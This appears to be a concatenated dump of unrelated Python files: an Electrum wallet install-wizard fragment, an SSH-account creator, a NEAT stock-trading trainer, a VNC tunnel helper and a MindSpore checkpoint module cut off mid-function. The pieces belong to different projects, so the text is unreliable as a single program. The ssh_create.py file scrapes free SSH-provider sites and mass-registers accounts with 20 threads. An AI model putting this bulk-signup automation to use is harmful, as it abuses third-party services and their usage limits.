next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), self.bip39, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def __init__(self, *args, **kwargs):
RestoreSeedDialog.__init__(self, *args, **kwargs)
self.ids.seed_dialog_header.ids.options_button.disabled = True
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
def is_valid(x):
try:
return kwargs['is_valid'](x)
except:
return False
self.is_valid = is_valid
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/restoring wallet(s).
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg, on_finished=None):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
if on_finished:
def protected_on_finished():
try:
on_finished()
except Exception as e:
self.show_error(str(e))
Clock.schedule_once(lambda dt: protected_on_finished(), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://electrum/gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, *, storage=None, aborted=False):
if storage is None and not aborted:
storage = self.create_storage(self.path)
self.dispatch('on_wizard_complete', storage)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def choice_and_line_dialog(self, **kwargs): ChoiceLineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def confirm_dialog(self, **kwargs):
WizardConfirmDialog(self, **kwargs).open()
def tos_dialog(self, **kwargs):
WizardTOSDialog(self, **kwargs).open()
def email_dialog(self, **kwargs):
WizardEmailDialog(self, **kwargs).open()
def otp_dialog(self, **kwargs):
if kwargs['otp_secret']:
WizardNewOTPDialog(self, **kwargs).open()
else:
WizardKnownOTPDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_message(self, msg): self.show_error(msg)
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
if force_disable_encrypt_cb:
# do not request PIN for watching-only wallets
run_next(None, False)
return
def on_success(old_pin, pin):
assert old_pin is None
run_next(pin, True)
def on_failure():
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(app, wallet=None, msg=_('Choose PIN code'),
on_success=on_success, on_failure=on_failure, is_change=2)
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
ssh_create.py
|
import os
import re
import time
import json
import requests
import threading
from .app import *
from bs4 import BeautifulSoup
try:
from queue import Queue
except ImportError:
from Queue import Queue
class ssh_create(object):
def __init__(self, verbose=False):
super(ssh_create, self).__init__()
self.hostname_serverid = []
self.data_create_ssh = json.loads(open(real_path('/../database/servers.json')).read())['servers']
self.queue_accounts = Queue()
self.queue_threads = 20
self.accounts = []
self._created = 0
self.verbose = verbose
def log(self, value, status=None):
log(value, status=status)
def log_replace(self, value, log_datetime=False):
log_replace(value, log_datetime=log_datetime)
def log_exception(self, value, status=None):
log_exception(value, status=status)
def get_cookies(self, browser):
return requests.utils.dict_from_cookiejar(browser.cookies)
def created(self):
self._created += 1
def total(self):
return len(self.accounts) - self._created
def create(self, data, account):
serverid = account['serverid']
hostname = account['hostname']
username = account['username'].replace(data['replace-username'], '')
password = account['password'].replace(data['replace-password'], '')
HEAD = 'http://{name}{head}'.format(name=data['name'], head=data['head'].format(serverid=serverid))
POST = 'http://{name}{post}'.format(name=data['name'], post=data['post'])
loop = 0
while True:
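# retry account creation up to three times on empty responses or connection problems before giving up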
try:
if loop >= 1: self.log(results[:-7] + '[R1]' + results[-3:] + '!' if loop == 3 else results)
if loop == 3: break
results = '[Y1]{username_hostname:.<48} '.format(username_hostname=username+'[G1]@'+hostname+' ')
browser = requests.session()
browser.request('HEAD', HEAD, timeout=10)
response = browser.request('POST', POST,
data={'serverid': serverid, 'username': username, 'password': password},
headers={'Referer': POST},
cookies=self.get_cookies(browser),
timeout=15
)
if not response.text:
results = results + '[R1]No response'
loop = loop + 1
continue
elif 'Username already exist' in response.text:
results = results + '[Y1]200'
elif 'has been successfully created' in response.text:
results = results + '[G1]200'
elif 'Account maximum' in response.text:
results = results + '[R1]200'
else:
results = results + '[R1]' + str(response.text)
except requests.exceptions.Timeout:
results = results + '[R1]ERR'
loop = loop + 1
continue
except requests.exceptions.ConnectionError:
results = results + '[R2]ERR'
loop = loop + 1
continue
except Exception as exception:
results = results + '[R1]Exception: ' + str(exception)
self.created()
self.log(results)
self.log_replace('[Y1]{}'.format(self.total()), log_datetime=False)
break
def update_serverid_thread(self, data):
while True:
try:
response = requests.request('GET', 'http://{name}{page}'.format(name=data['name'], page=data['page']), timeout=10)
response = BeautifulSoup(response.text, 'html.parser')
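# pull the hostname and serverid out of each matching element using the regex patterns configured in servers.json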
for element in response.find_all(attrs={'class': data['pattern-class']}):
hostname = re.findall(r'{}'.format(data['pattern-hostname'].format(hostname=r'([a-zA-Z0-9]+(\.[a-zA-Z0-9]+)+)')), str(element))
serverid = re.findall(r'{}'.format(data['pattern-serverid'].format(serverid=r'([0-9]+)')), str(element))
hostname = hostname[0][0] if len(hostname) and len(hostname[0]) else ''
serverid = serverid[0] if len(serverid) else ''
if not hostname or not serverid:
hostname_available = False
for account in self.accounts:
if not hostname and hostname == account['hostname']:
hostname_available = True
break
if hostname_available or self.verbose:
self.log('[R1]{hostname:.<48} [R1]{serverid}{verbose}'.format(hostname=(hostname if hostname else '(empty hostname)') + ' [G1]', serverid=(serverid if serverid else '(empty serverid)') + ' ', verbose='[R1](verbose)' if self.verbose else ''))
continue
if self.verbose:
self.log('[G1]{hostname:.<48} [G1]{serverid}'.format(hostname=(hostname if hostname else '(empty hostname)') + ' [G1]', serverid=(serverid if serverid else '(empty serverid)') + ' '))
self.hostname_serverid.append({
'hostname': hostname,
'serverid': serverid
})
except requests.exceptions.Timeout:
self.log('[R1]Connection timeout')
continue
except requests.exceptions.ConnectionError:
self.log('[R1]Connection closed')
except Exception as exception:
self.log_exception(exception)
break
def update_serverid(self):
self.log('Updating serverid')
threads = []
for data in self.data_create_ssh:
name_available = False
for account in self.accounts:
if account['name'] == data['name']:
name_available = True
break
if name_available: threads.append(threading.Thread(target=self.update_serverid_thread, args=(data, )))
for thread in threads:
thread.daemon = True
thread.start()
for thread in threads:
thread.join()
for i in range(len(self.accounts)):
for data in self.hostname_serverid:
hostname = data['hostname']
serverid = data['serverid']
if hostname == self.accounts[i]['hostname']:
self.accounts[i]['serverid'] = serverid
self.hostname_serverid = []
self.log('Updating serverid complete')
def create_thread(self):
while True:
account = self.queue_accounts.get()
for data in self.data_create_ssh:
if data['name'] == account['name']:
self.create(data, account)
break
self.queue_accounts.task_done()
if self.queue_accounts.qsize() == 0: break
def start(self):
if len(self.accounts) >= 1:
message = '[G1]Creating {len_accounts} ssh accounts'.format(len_accounts=len(self.accounts))
self.log(message + ' ' * 8)
self.update_serverid()
for account in self.accounts:
if account.get('serverid'):
self.queue_accounts.put(account)
for i in range(self.queue_threads):
threading.Thread(target=self.create_thread).start()
self.queue_accounts.join()
self.accounts = []
self.log('{message} complete'.format(message=message))
|
neatrader.py
|
import neat
import pandas as pd
from glob import glob
import neatrader.visualize as vis
from neatrader.model import Portfolio, Security
from neatrader.trading import Simulator
from neatrader.daterange import DateRangeFactory
from neatrader.utils import from_small_date
from neatrader.reporter import TradeReporter
from pathlib import Path
from multiprocessing import Process, Manager
TSLA = Security('TSLA')
path = Path('normalized') / TSLA.symbol
training = pd.read_csv(path / 'training.csv', parse_dates=['date'], date_parser=from_small_date)
validation = pd.read_csv(path / 'cross_validation.csv', parse_dates=['date'], date_parser=from_small_date)
training_daterange_factory = DateRangeFactory(training)
cv_daterange_factory = DateRangeFactory(validation)
def worker(mode, simulator, net, start, end, return_dict):
return_dict[mode] = simulator.simulate(net, start, end)
def eval_genomes(genomes, config):
# all genomes should be compared using the same date range
t_start, t_end = training_daterange_factory.random_date_range(90)
c_start, c_end = cv_daterange_factory.random_date_range(90)
return_dict = Manager().dict()
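# evaluate each genome on the training and cross-validation ranges in two separate processes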
for genome_id, genome in genomes:
net = neat.nn.FeedForwardNetwork.create(genome, config)
portfolio = Portfolio(cash=0, securities={TSLA: 100})
t_sim = Simulator(TSLA, portfolio, path, training)
c_sim = Simulator(TSLA, portfolio, path, validation)
train_p = Process(target=worker, args=('training', t_sim, net, t_start, t_end, return_dict))
validation_p = Process(target=worker, args=('validation', c_sim, net, c_start, c_end, return_dict))
train_p.start()
validation_p.start()
train_p.join()
validation_p.join()
genome.fitness = return_dict['training']
genome.cv_fitness = return_dict['validation']
def run(config_file):
config = neat.Config(
neat.DefaultGenome,
neat.DefaultReproduction,
neat.DefaultSpeciesSet,
neat.DefaultStagnation,
config_file
)
while True:
checkpoint = sorted(glob('neat-checkpoint-*'), reverse=True)
if checkpoint:
pop = neat.Checkpointer.restore_checkpoint(checkpoint[0])
else:
pop = neat.Population(config)
stats = neat.StatisticsReporter()
# add a stdout reporter to show progress in terminal
pop.add_reporter(neat.StdOutReporter(True))
pop.add_reporter(stats)
pop.add_reporter(neat.Checkpointer(50))
winner = pop.run(eval_genomes, 50)
# display the winning genome
print(f"\nBest genome:\n{winner}")
win_net = neat.nn.FeedForwardNetwork.create(winner, config)
view = False
vis.plot_stats(stats, ylog=False, view=view)
vis.plot_species(stats, view=view)
portfolio = Portfolio(cash=0, securities={TSLA: 100})
simulator = Simulator(TSLA, portfolio, path, training)
daterange = training_daterange_factory.random_date_range(90)
reporter = TradeReporter()
vis.plot_trades(win_net, simulator, daterange, training, path, reporter, view=view)
node_names = {0: 'Buy', 1: 'Sell', 2: 'Hold', 3: 'Delta', 4: 'Theta'}
vis.draw_net(config, winner, view=view, node_names=node_names)
|
vnc-hopper.py
|
#!/usr/bin/env python3
import subprocess
import random
import re
import sys
import os
from threading import Thread
# settings
# jumpserver aliases:
servers = [
'koios1-limba',
'koios2-limba',
]
start_vnc_timeout = 10
# classes:
class VncClientRunner():
def run_vnc_client(self, vnc_server_host, display_id):
# smth like this: vncviewer -via koios1-limba localhost:2
passwd_file = str(local_home) + "/.vnc/passwd"
if os.path.isfile(passwd_file): # if there is password file, let's use it:
command_array = [
'vncviewer', '-via', vnc_server_host, 'localhost:' + str(display_id),
"-passwd="+passwd_file
]
else:
command_array = [
'vncviewer', '-via', vnc_server_host, 'localhost:' + str(display_id)
]
print(str(command_array))
try:
vnc_subprocess = subprocess.Popen(
command_array, # try to run well-known command
stderr=subprocess.PIPE,
stdout=subprocess.PIPE
)
except Exception as exc:
# Popen itself failed (e.g. vncviewer not installed), so vnc_subprocess may not exist yet
print("Exception in run_vnc_client, let's end this: " + str(exc))
sys.exit(1)
else:
dump_buffer(vnc_subprocess.stdout)
dump_buffer(vnc_subprocess.stderr)
sys.exit(0)
# functions
def dump_buffer(buffer):
lines = buffer.readlines()
for line in lines:
print(str(line.decode('utf-8')).strip())
def start_vnc(server):
# start vnc
try:
start_vnc_output = subprocess.Popen(
['ssh', server, "vncserver","-localhost" ], # try to run vncserver, localhost only.
stderr=subprocess.PIPE,
stdout=subprocess.PIPE
)
dump_buffer(start_vnc_output.stdout)
dump_buffer(start_vnc_output.stderr)
except:
print("Exception in run_vnc_client")
return False
else:
if start_vnc_output.wait(start_vnc_timeout) != 0:
print("Non-zero RC code in start_vnc_output.wait command vncserver...")
return False
if start_vnc_output.returncode != 0:
print("Non-zero RC code for command vncserver...")
return False
# ok, not bad:
return True
def try_ssh(server):
# first check ssh connectivity:
try:
ssh_try_output = subprocess.Popen(
['ssh', server, "uname"], # try to run well-known command
stderr=subprocess.PIPE,
stdout=subprocess.PIPE
)
except:
print("Exception in try_ssh")
return False
else:
uname_string = str(ssh_try_output.stdout.readlines()[0].decode('utf-8')).strip()
if uname_string == 'Linux':
return True
return False
def download_vnc_pass(server):
# first check ssh connectivity:
try:
cmd_string_list = ['scp', server + ":.vnc/passwd", local_home + "/.vnc/"]  # remote path is relative to $HOME; subprocess passes args without shell quoting
print(cmd_string_list)
ssh_try_output = subprocess.Popen(
cmd_string_list,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE
)
print("download_vnc_pass")
dump_buffer(ssh_try_output.stdout)
dump_buffer(ssh_try_output.stderr)
print("download_vnc_pass_end")
except:
print("Exception in download_vnc_pass")
return False
else:
if ssh_try_output.wait() == 0: return True  # returncode is only set after wait()
return False
def discovery_servers(servers):
# collect info about servers: (buffers)
discovery_outputs = {} # array of buffers
for server in servers:
try:
discovery_output = subprocess.Popen(
["ssh", server, "vncserver", "-list"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE
)
except:
print("Problem occurred when trying to connect to server " + server + ", skipping.")
else:
discovery_outputs[server] = discovery_output
# compile RE to match lines like:
# :3 135784 - 3 is display number, the second number is PID
pattern = re.compile(r"^:\d+\s+\d+$")
server_list = []
# find running sessions and ports:
for host in discovery_outputs:
lines = discovery_outputs[host].stdout.readlines()
for line in lines:
decoded_line = str(line.decode("utf-8")).strip()
if decoded_line == '': # we skip empty lines
continue
if "TigerVNC" in decoded_line: # we skip title line
continue
if "PROCESS" in decoded_line: # we skip headers
continue
if pattern.match(decoded_line): # parse port and pid
display_id, vnc_pid = decoded_line.split()
display_id = str(display_id).replace(':', '')
server_list.append((str(host), int(display_id), int(vnc_pid)))
if len(server_list) == 0: # no server
return None
else: # return first server: :)
return server_list[0] # take the first one :))
# main
if __name__ == '__main__':
local_home = os.getenv("HOME")
# check if there is any server running, if not, start one:
ds = discovery_servers(servers)
if not ds or ds == 0:
print("There is no running VNC server, let's start one..")
servers_shuffled = random.sample(servers, len(servers))
for server in servers_shuffled:
print("trying ssh to server " + str(server) + "...")
if not try_ssh(server):
continue
print("server with ssh:" + server)
print("starting vnc on server " + str(server) + "...")
if not start_vnc(server):
continue
print("we started vnc server on " + str(server))
break
# now one should be running. if not, then there's something wrong.
ds = discovery_servers(servers)
if not ds or ds == 0:
print("There is no running VNC server and the attempts to start it failed. Contact support.")
sys.exit(1)
host, display_id, pid = ds  # reuse the tuple returned by the discovery above instead of querying the servers again
# download vnc password from server:
#download_vnc_pass(host) #notworking
# let's start vnc client with tunnel:
sshR = VncClientRunner()
ssh_tunnel_thread = Thread(target=sshR.run_vnc_client, args=(host, display_id))
ssh_tunnel_thread.start()
# let's wait for the thread with vncviewer to finish (or to fail..)
ssh_tunnel_thread.join()
|
serialization.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Model and parameters serialization."""
import os
import stat
import math
from threading import Thread, Lock
import numpy as np
import mindspore.nn as nn
from mindspore import log as logger
from mindspore.train.checkpoint_pb2 import Checkpoint
from mindspore.train.print_pb2 import Print
from mindspore.train.node_strategy_pb2 import ParallelStrategyMap
from mindspore.common.tensor import Tensor
from mindspore.common.initializer import initializer
from mindspore.common.parameter import Parameter
from mindspore.common.api import _executor
from mindspore.common import dtype as mstype
from mindspore._checkparam import check_input_data
__all__ = ["save_checkpoint", "load_checkpoint", "load_param_into_net", "export", "parse_print",
"build_searched_strategy", "merge_sliced_parameter"]
tensor_to_ms_type = {"Int8": mstype.int8, "Uint8": mstype.uint8, "Int16": mstype.int16, "Uint16": mstype.uint16,
"Int32": mstype.int32, "Uint32": mstype.uint32, "Int64": mstype.int64, "Uint64": mstype.uint64,
"Float16": mstype.float16, "Float32": mstype.float32, "Float64": mstype.float64,
"Bool": mstype.bool_}
tensor_to_np_type = {"Int8": np.int8, "Uint8": np.uint8, "Int16": np.int16, "Uint16": np.uint16,
"Int32": np.int32, "Uint32": np.uint32, "Int64": np.int64, "Uint64": np.uint64,
"Float16": np.float16, "Float32": np.float32, "Float64": np.float64, "Bool": np.bool_}
_ckpt_mutex = Lock()
SLICE_SIZE = 512 * 1024 * 1024
def _special_process_par(par, new_par):
"""
Processes the special condition.
Like (12,2048,1,1)->(12,2048); this case is caused by GE's 4-dimensional tensors.
"""
par_shape_len = len(par.data.shape)
new_par_shape_len = len(new_par.data.shape)
delta_len = new_par_shape_len - par_shape_len
delta_i = 0
for delta_i in range(delta_len):
if new_par.data.shape[par_shape_len + delta_i] != 1:
break
if delta_i == delta_len - 1:
new_val = new_par.data.asnumpy()
new_val = new_val.reshape(par.data.shape)
par.set_data(Tensor(new_val, par.data.dtype))
return True
return False
def _update_param(param, new_param):
"""Updates param's data from new_param's data."""
if isinstance(param.data, Tensor) and isinstance(new_param.data, Tensor):
if param.data.dtype != new_param.data.dtype:
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, param.data.dtype, new_param.data.dtype))
raise RuntimeError(msg)
if param.data.shape != new_param.data.shape:
if not _special_process_par(param, new_param):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) different from parameter_dict's({})"
.format(param.name, param.data.shape, new_param.data.shape))
raise RuntimeError(msg)
return
param.set_data(new_param.data)
return
if isinstance(param.data, Tensor) and not isinstance(new_param.data, Tensor):
if param.data.shape != (1,) and param.data.shape != ():
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) is not (1,), inconsitent with parameter_dict's(scalar)."
.format(param.name, param.data.shape))
raise RuntimeError(msg)
param.set_data(initializer(new_param.data, param.data.shape, param.data.dtype))
elif isinstance(new_param.data, Tensor) and not isinstance(param.data, Tensor):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, type(param.data), type(new_param.data)))
raise RuntimeError(msg)
else:
param.set_data(type(param.data)(new_param.data))
def _exec_save(ckpt_file_name, data_list):
"""Execute save checkpoint into file process."""
try:
with _ckpt_mutex:
if os.path.exists(ckpt_file_name):
os.remove(ckpt_file_name)
with open(ckpt_file_name, "ab") as f:
for name, value in data_list.items():
data_size = value[2].nbytes
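# tensors larger than SLICE_SIZE are split so that each serialized Checkpoint message stays small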
if data_size > SLICE_SIZE:
slice_count = math.ceil(data_size / SLICE_SIZE)
param_slice_list = np.array_split(value[2], slice_count)
else:
param_slice_list = [value[2]]
for param_slice in param_slice_list:
checkpoint_list = Checkpoint()
param_value = checkpoint_list.value.add()
param_value.tag = name
param_tensor = param_value.tensor
param_tensor.dims.extend(value[0])
param_tensor.tensor_type = value[1]
param_tensor.tensor_content = param_slice.tobytes()  # tostring() is deprecated; tobytes() is the equivalent call
f.write(checkpoint_list.SerializeToString())
os.chmod(ckpt_file_name, stat.S_IRUSR)
except BaseException as e:
logger.error("Failed to save the checkpoint file %s.", ckpt_file_name)
raise e
def save_checkpoint(save_obj, ckpt_file_name, integrated_save=True, async_save=False):
"""
Saves checkpoint info to a specified file.
Args:
save_obj (nn.Cell or list): The cell object or parameters list(each element is a dictionary,
like {"name": param_name, "data": param_data}.)
ckpt_file_name (str): Checkpoint file name. If the file name already exists, it will be overwritten.
integrated_save (bool): Whether to integrated save in automatic model parallel scene.
async_save (bool): Whether asynchronous execution saves the checkpoint to a file. Default: False
Raises:
TypeError: If the parameter save_obj is not nn.Cell or list type.
RuntimeError: Failed to save the Checkpoint file.
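Examples:
>>> # a minimal sketch; assumes `net` is an initialized nn.Cell instance
>>> save_checkpoint(net, "./lenet.ckpt")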
"""
if not isinstance(save_obj, nn.Cell) and not isinstance(save_obj, list):
raise TypeError("The parameter save_obj should be nn.Cell or list, but got {}".format(type(save_obj)))
logger.info("Execute save checkpoint process.")
if isinstance(save_obj, nn.Cell):
save_obj.init_parameters_data()
param_dict = {}
for _, param in save_obj.parameters_and_names():
param_dict[param.name] = param
param_list = []
for (key, value) in param_dict.items():
each_param = {"name": key}
if isinstance(value.data, Tensor):
param_data = value.data
else:
param_data = Tensor(value.data)
# in the automatic model parallel scenario, some parameters were split across all the devices,
# and should be combined before saving
if integrated_save and key in save_obj.parameter_layout_dict:
param_data = _get_merged_param_data(save_obj, key, param_data)
each_param["data"] = param_data
param_list.append(each_param)
save_obj = param_list
data_list = {}
with _ckpt_mutex:
for param in save_obj:
key = param["name"]
data_list[key] = []
if isinstance(param["data"], Parameter):
param["data"].init_data()
dims = []
if param['data'].shape == ():
dims.append(0)
else:
for dim in param['data'].shape:
dims.append(dim)
data_list[key].append(dims)
tensor_type = str(param["data"].dtype)
data_list[key].append(tensor_type)
data = param["data"].asnumpy().reshape(-1)
data_list[key].append(data)
if async_save:
thr = Thread(target=_exec_save, args=(ckpt_file_name, data_list), name="asyn_save_ckpt")
thr.start()
else:
_exec_save(ckpt_file_name, data_list)
logger.info("Save checkpoint process finish.")
def load_checkpoint(ckpt_file_name, net=None):
"""
Loads checkpoint info from a specified file.
Args:
ckpt_file_name (str): Checkpoint file name.
net (Cell): Cell network. Default: None
Returns:
Dict, key is parameter name, value is a Parameter.
Raises:
ValueError: Checkpoint file is incorrect.
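Examples:
>>> # a minimal sketch; "./lenet.ckpt" is a placeholder path to an existing checkpoint file
>>> param_dict = load_checkpoint("./lenet.ckpt")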
"""
if not isinstance(ckpt_file_name, str):
raise ValueError("The ckpt_file_name must be string.")
if not os.path.exists(ckpt_file_name):
raise ValueError("The checkpoint file is not exist.")
if ckpt_file_name[-5:] != ".ckpt":
raise ValueError("Please input the correct checkpoint file name.")
if os.path.getsize(ckpt_file_name) == 0:
raise ValueError("The checkpoint file may be empty, please make sure enter the correct file name.")
logger.info("Execute load checkpoint process.")
checkpoint_list = Checkpoint()
try:
with open(ckpt_file_name, "rb") as f:
pb_content = f.read()
checkpoint_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the checkpoint file `%s`, please check the correct of the file.", ckpt_file_name)
raise ValueError(e.__str__())
parameter_dict = {}
try:
element_id = 0
param_data_list = []
for element in checkpoint_list.value:
data = element.tensor.tensor_content
data_type = element.tensor.tensor_type
np_type = tensor_to_np_type[data_type]
ms_type = tensor_to_ms_type[data_type]
element_data = np.frombuffer(data, np_type)
param_data_list.append(element_data)
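# consecutive elements with the same tag are slices of one parameter; concatenate them when the tag changes or at the end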
if (element_id == len(checkpoint_list.value) - 1) or \
(element.tag != checkpoint_list.value[element_id + 1].tag):
param_data = np.concatenate((param_data_list), axis=0)
param_data_list.clear()
dims = element.tensor.dims
if dims == [0]:
if 'Float' in data_type:
param_data = float(param_data[0])
elif 'Int' in data_type:
param_data = int(param_data[0])
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
elif dims == [1]:
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
else:
param_dim = []
for dim in dims:
param_dim.append(dim)
param_value = param_data.reshape(param_dim)
parameter_dict[element.tag] = Parameter(Tensor(param_value, ms_type), name=element.tag)
element_id += 1
logger.info("Load checkpoint process finish.")
except BaseException as e:
logger.error("Failed to load the checkpoint file `%s`.", ckpt_file_name)
raise RuntimeError(e.__str__())
if net is not None:
load_param_into_net(net, parameter_dict)
return parameter_dict
def load_param_into_net(net, parameter_dict):
"""
Loads parameters into network.
Args:
net (Cell): Cell network.
parameter_dict (dict): Parameter dictionary.
Raises:
TypeError: Argument is not a Cell, or parameter_dict is not a Parameter dictionary.
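Examples:
>>> # a minimal sketch; assumes `net` is an nn.Cell and `param_dict` comes from load_checkpoint
>>> param_not_load = load_param_into_net(net, param_dict)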
"""
if not isinstance(net, nn.Cell):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument net should be a Cell, but got {}.".format(type(net)))
raise TypeError(msg)
if not isinstance(parameter_dict, dict):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict should be a dict, but got {}.".format(type(parameter_dict)))
raise TypeError(msg)
logger.info("Execute load parameter into net process.")
net.init_parameters_data()
param_not_load = []
for _, param in net.parameters_and_names():
if param.name in parameter_dict:
new_param = parameter_dict[param.name]
if not isinstance(new_param, Parameter):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict element should be a Parameter, but got {}.".format(type(new_param)))
raise TypeError(msg)
_update_param(param, new_param)
else:
param_not_load.append(param.name)
if param_not_load:
_load_dismatch_prefix_params(net, parameter_dict, param_not_load)
logger.debug("Params not matched(in net but not in parameter_dict):")
for param_name in param_not_load:
logger.debug("%s", param_name)
logger.info("Load parameter into net finish, {} parameters has not been loaded.".format(len(param_not_load)))
return param_not_load
def _load_dismatch_prefix_params(net, parameter_dict, param_not_load):
"""When some net parameter did not load, try to continue load."""
prefix_name = ""
longest_name = param_not_load[0]
while prefix_name != longest_name and param_not_load:
logger.debug("Count: {} parameters has not been loaded, try to load continue.".format(len(param_not_load)))
prefix_name = longest_name
for net_param_name in param_not_load:
for dict_name in parameter_dict:
if dict_name.endswith(net_param_name):
prefix_name = dict_name[:-len(net_param_name)]
break
if prefix_name != longest_name:
break
if prefix_name != longest_name:
logger.warning("Remove parameter prefix name: {}, continue to load.".format(prefix_name))
for _, param in net.parameters_and_names():
new_param_name = prefix_name + param.name
if param.name in param_not_load and new_param_name in parameter_dict:
new_param = parameter_dict[new_param_name]
_update_param(param, new_param)
param_not_load.remove(param.name)
def _save_graph(network, file_name):
"""
Saves the graph of network to a file.
Args:
network (Cell): Obtain a pipeline through network for saving graph.
file_name (str): Graph file name into which the graph will be saved.
"""
logger.info("Execute save the graph process.")
graph_proto = network.get_func_graph_proto()
if graph_proto:
with open(file_name, "wb") as f:
f.write(graph_proto)
os.chmod(file_name, stat.S_IRUSR)
def _get_merged_param_data(net, param_name, param_data):
"""
Gets the merged data (tensor) from a tensor slice, using the device arrangement and tensor map.
Args:
net (Cell): MindSpore network.
param_name (str): The name of the parameter to be combined.
param_data (Tensor): The parameter data on the local device; it is a slice of the whole parameter data.
Returns:
Tensor, the combined tensor with the whole data value.
"""
layout = net.parameter_layout_dict[param_name]
if len(layout) < 5:
logger.info("layout dict does not contain the key %s", param_name)
return param_data
dev_mat = layout[0]
tensor_map = layout[1]
field_size = layout[3]
uniform_split = layout[4]
if uniform_split[0] == 0:
raise RuntimeError("Save checkpoint only support uniform split tensor now.")
from mindspore.parallel._cell_wrapper import get_allgather_cell
from mindspore.parallel._tensor import _reshape_param_data, _reshape_param_data_with_weight
# if any dim in the tensor map is not -1, the param is split across devices and needs to be merged
for dim in tensor_map:
if dim != -1:
allgather_net = get_allgather_cell()
param_data = allgather_net(param_data)
if field_size[0]:
return _reshape_param_data_with_weight(param_data, dev_mat, field_size)
return _reshape_param_data(param_data, dev_mat, tensor_map)
return param_data
def _fill_param_into_net(net, parameter_list):
"""
Fills parameter_list into net.
Args:
net (Cell): train network.
parameter_list (list): parameters list from ge callback.
"""
parameter_dict = {}
for each_param in parameter_list:
param_name = each_param["name"]
if isinstance(each_param["data"], Parameter):
each_param["data"].init_data()
np_val = each_param["data"].asnumpy()
if np_val.shape == (1,):
parameter_dict[param_name] = Parameter(np_val, name=param_name)
elif np_val.shape == ():
parameter_dict[param_name] = Parameter(Tensor(np_val.tolist(), mstype.pytype_to_dtype(np_val.dtype)),
name=param_name)
else:
